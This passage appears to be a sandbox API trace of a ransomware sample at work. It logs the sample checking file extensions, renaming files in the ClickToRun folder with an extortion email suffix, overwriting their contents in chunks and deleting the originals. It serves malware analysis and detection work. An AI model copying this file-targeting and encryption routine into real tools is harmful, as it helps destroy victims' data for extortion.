returned 85 [0179.175] lstrlenW (lpString=".doc") returned 4 [0179.175] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.175] lstrlenW (lpString=".docx") returned 5 [0179.175] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1 [0179.175] lstrlenW (lpString=".pdf") returned 4 [0179.175] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.175] lstrlenW (lpString=".xls") returned 4 [0179.175] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.175] lstrlenW (lpString=".xlsx") returned 5 [0179.175] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1 [0179.175] lstrlenW (lpString=".ppt") returned 4 [0179.175] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0179.175] lstrlenW (lpString=".zip") returned 4 [0179.175] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.175] lstrlenW (lpString=".rar") returned 4 [0179.175] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.175] lstrlenW (lpString=".bz2") returned 4 [0179.175] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.175] lstrlenW (lpString=".7z") returned 3 [0179.175] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0179.175] lstrlenW (lpString=".dbf") returned 4 [0179.175] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0179.176] lstrlenW (lpString=".1cd") returned 4 [0179.176] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.176] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0179.176] lstrlenW (lpString=".jpg") returned 4 [0179.176] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.176] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0179.176] lstrlenW (lpString="AppVIsvSubsystemController.dll") returned 30 [0179.176] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0179.176] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=1402584) returned 1 [0179.176] CloseHandle (hObject=0x348) returned 1 [0179.177] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll")) returned 0x20 [0179.177] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.177] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0179.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0179.177] lstrlenW (lpString=".doc") returned 4 [0179.177] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.177] lstrlenW (lpString=".docx") returned 5 [0179.177] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1 [0179.177] lstrlenW (lpString=".pdf") returned 4 [0179.177] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.177] lstrlenW (lpString=".xls") returned 4 [0179.177] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.177] lstrlenW (lpString=".xlsx") returned 5 [0179.177] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1 [0179.177] lstrlenW (lpString=".ppt") returned 4 [0179.177] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0179.177] lstrlenW (lpString=".zip") returned 4 [0179.177] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.178] lstrlenW (lpString=".rar") returned 4 [0179.178] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.178] lstrlenW (lpString=".bz2") returned 4 [0179.178] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.178] lstrlenW (lpString=".7z") returned 3 [0179.178] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0179.178] lstrlenW (lpString=".dbf") returned 4 [0179.178] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0179.178] lstrlenW (lpString=".1cd") returned 4 [0179.178] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0179.178] lstrlenW (lpString=".jpg") returned 4 [0179.178] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0179.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0179.178] lstrlenW (lpString=".doc") returned 4 [0179.178] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.178] lstrlenW (lpString=".docx") returned 5 [0179.178] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1 [0179.178] lstrlenW (lpString=".pdf") returned 4 [0179.178] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.178] lstrlenW (lpString=".xls") returned 4 [0179.178] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.178] lstrlenW (lpString=".xlsx") returned 5 [0179.178] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1 [0179.178] lstrlenW (lpString=".ppt") returned 4 [0179.179] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0179.179] lstrlenW (lpString=".zip") returned 4 [0179.179] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.179] lstrlenW (lpString=".rar") returned 4 [0179.179] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.179] lstrlenW (lpString=".bz2") returned 4 [0179.179] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.179] lstrlenW (lpString=".7z") returned 3 [0179.179] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0179.179] lstrlenW (lpString=".dbf") returned 4 [0179.179] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0179.179] lstrlenW (lpString=".1cd") returned 4 [0179.179] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 88 [0179.179] lstrlenW (lpString=".jpg") returned 4 [0179.179] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.179] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0179.179] lstrlenW (lpString="AppvIsvSubsystems32.dll") returned 23 [0179.179] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0179.180] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=1761448) returned 1 [0179.180] CloseHandle (hObject=0x348) returned 1 [0179.180] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll")) returned 0x20 [0179.180] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.180] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0179.181] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0179.181] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fc64 | out: lpNewFilePointer=0x0) returned 1 [0179.182] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fc24 | out: lpNewFilePointer=0x0) returned 1 [0179.182] ReadFile (in: hFile=0x348, lpBuffer=0x4049058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x361fc30, lpOverlapped=0x0 | out: lpBuffer=0x4049058*, lpNumberOfBytesRead=0x361fc30*=0x40000, lpOverlapped=0x0) returned 1 [0179.226] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x8f58d, lpNewFilePointer=0x0, dwMoveMethod=0x361fc24 | out: lpNewFilePointer=0x0) returned 1 [0179.226] ReadFile (in: hFile=0x348, lpBuffer=0x4089058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x361fc30, lpOverlapped=0x0 | out: lpBuffer=0x4089058*, lpNumberOfBytesRead=0x361fc30*=0x40000, lpOverlapped=0x0) returned 1 [0179.278] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x361fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.278] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x16e0a8, lpNewFilePointer=0x0, dwMoveMethod=0x361fc24 | out: lpNewFilePointer=0x0) returned 1 [0179.278] ReadFile (in: hFile=0x348, lpBuffer=0x40c9058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x361fc30, lpOverlapped=0x0 | out: lpBuffer=0x40c9058*, lpNumberOfBytesRead=0x361fc30*=0x40000, lpOverlapped=0x0) returned 1 [0179.353] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.354] WriteFile (in: hFile=0x348, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xc011a, lpNumberOfBytesWritten=0x361fca8, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fca8*=0xc011a, lpOverlapped=0x0) returned 1 [0179.629] SetEndOfFile (hFile=0x348) returned 1 [0179.820] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40000) returned 0x44250b0 [0179.824] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fc74 | out: lpNewFilePointer=0x0) returned 1 [0179.824] WriteFile (in: hFile=0x348, lpBuffer=0x44250b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x361fc80, lpOverlapped=0x0 | out: lpBuffer=0x44250b0*, lpNumberOfBytesWritten=0x361fc80*=0x40000, lpOverlapped=0x0) returned 1 [0179.827] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x8f58d, lpNewFilePointer=0x0, dwMoveMethod=0x361fc74 | out: lpNewFilePointer=0x0) returned 1 [0179.828] WriteFile (in: hFile=0x348, lpBuffer=0x44250b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x361fc80, lpOverlapped=0x0 | out: lpBuffer=0x44250b0*, lpNumberOfBytesWritten=0x361fc80*=0x40000, lpOverlapped=0x0) returned 1 [0179.829] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x16e0a8, lpNewFilePointer=0x0, dwMoveMethod=0x361fc74 | out: lpNewFilePointer=0x0) returned 1 [0179.829] WriteFile (in: hFile=0x348, lpBuffer=0x44250b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x361fc80, lpOverlapped=0x0 | out: lpBuffer=0x44250b0*, lpNumberOfBytesWritten=0x361fc80*=0x40000, lpOverlapped=0x0) returned 1 [0179.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0179.834] CloseHandle (hObject=0x348) returned 1 [0179.834] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0179.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0179.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0179.834] lstrlenW (lpString=".doc") returned 4 [0179.834] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.834] lstrlenW (lpString=".docx") returned 5 [0179.834] lstrcmpiW (lpString1=".docx", lpString2="2.dll") returned -1 [0179.834] lstrlenW (lpString=".pdf") returned 4 [0179.834] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.834] lstrlenW (lpString=".xls") returned 4 [0179.834] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.834] lstrlenW (lpString=".xlsx") returned 5 [0179.834] lstrcmpiW (lpString1=".xlsx", lpString2="2.dll") returned -1 [0179.835] lstrlenW (lpString=".ppt") returned 4 [0179.835] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0179.835] lstrlenW (lpString=".zip") returned 4 [0179.835] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.835] lstrlenW (lpString=".rar") returned 4 [0179.835] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.835] lstrlenW (lpString=".bz2") returned 4 [0179.835] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.835] lstrlenW (lpString=".7z") returned 3 [0179.835] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0179.835] lstrlenW (lpString=".dbf") returned 4 [0179.835] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0179.835] lstrlenW (lpString=".1cd") returned 4 [0179.835] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0179.835] lstrlenW (lpString=".jpg") returned 4 [0179.835] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0179.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0179.835] lstrlenW (lpString=".doc") returned 4 [0179.835] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.835] lstrlenW (lpString=".docx") returned 5 [0179.835] lstrcmpiW (lpString1=".docx", lpString2="2.dll") returned -1 [0179.835] lstrlenW (lpString=".pdf") returned 4 [0179.835] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.835] lstrlenW (lpString=".xls") returned 4 [0179.835] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.835] lstrlenW (lpString=".xlsx") returned 5 [0179.835] lstrcmpiW (lpString1=".xlsx", lpString2="2.dll") returned -1 [0179.836] lstrlenW (lpString=".ppt") returned 4 [0179.836] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0179.836] lstrlenW (lpString=".zip") returned 4 [0179.836] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.836] lstrlenW (lpString=".rar") returned 4 [0179.836] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.836] lstrlenW (lpString=".bz2") returned 4 [0179.836] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.836] lstrlenW (lpString=".7z") returned 3 [0179.836] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0179.836] lstrlenW (lpString=".dbf") returned 4 [0179.836] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0179.836] lstrlenW (lpString=".1cd") returned 4 [0179.836] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 81 [0179.836] lstrlenW (lpString=".jpg") returned 4 [0179.836] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.836] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0179.836] lstrlenW (lpString="concrt140.dll") returned 13 [0179.836] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0179.837] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=332968) returned 1 [0179.837] CloseHandle (hObject=0x348) returned 1 [0179.837] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll")) returned 0x20 [0179.837] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.837] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0179.837] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.837] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.837] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0179.838] GetLastError () returned 0x0 [0179.838] ReadFile (in: hFile=0x348, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x514a8, lpOverlapped=0x0) returned 1 [0181.232] WriteFile (in: hFile=0x334, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x514b0, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x514b0, lpOverlapped=0x0) returned 1 [0181.250] ReadFile (in: hFile=0x348, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0181.250] WriteFile (in: hFile=0x334, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xee, lpOverlapped=0x0) returned 1 [0181.250] SetEndOfFile (hFile=0x334) returned 1 [0181.250] CloseHandle (hObject=0x334) returned 1 [0181.251] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.251] SetEndOfFile (hFile=0x348) returned 1 [0181.254] CloseHandle (hObject=0x348) returned 1 [0181.254] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0181.255] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll")) returned 1 [0181.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll") returned 71 [0181.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll") returned 71 [0181.255] lstrlenW (lpString=".doc") returned 4 [0181.255] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.255] lstrlenW (lpString=".docx") returned 5 [0181.255] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0181.255] lstrlenW (lpString=".pdf") returned 4 [0181.255] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.255] lstrlenW (lpString=".xls") returned 4 [0181.255] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.255] lstrlenW (lpString=".xlsx") returned 5 [0181.255] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0181.255] lstrlenW (lpString=".ppt") returned 4 [0181.255] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll") returned 71 [0181.255] lstrlenW (lpString=".zip") returned 4 [0181.255] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.255] lstrlenW (lpString=".rar") returned 4 [0181.255] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.255] lstrlenW (lpString=".bz2") returned 4 [0181.255] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.255] lstrlenW (lpString=".7z") returned 3 [0181.256] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll") returned 71 [0181.256] lstrlenW (lpString=".dbf") returned 4 [0181.256] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll") returned 71 [0181.256] lstrlenW (lpString=".1cd") returned 4 [0181.256] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll") returned 71 [0181.256] lstrlenW (lpString=".jpg") returned 4 [0181.256] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll") returned 71 [0181.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll") returned 71 [0181.256] lstrlenW (lpString=".doc") returned 4 [0181.256] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.256] lstrlenW (lpString=".docx") returned 5 [0181.256] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0181.256] lstrlenW (lpString=".pdf") returned 4 [0181.256] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.256] lstrlenW (lpString=".xls") returned 4 [0181.256] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.256] lstrlenW (lpString=".xlsx") returned 5 [0181.256] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0181.256] lstrlenW (lpString=".ppt") returned 4 [0181.256] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll") returned 71 [0181.256] lstrlenW (lpString=".zip") returned 4 [0181.256] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.256] lstrlenW (lpString=".rar") returned 4 [0181.257] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.257] lstrlenW (lpString=".bz2") returned 4 [0181.257] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.257] lstrlenW (lpString=".7z") returned 3 [0181.257] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll") returned 71 [0181.257] lstrlenW (lpString=".dbf") returned 4 [0181.257] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft 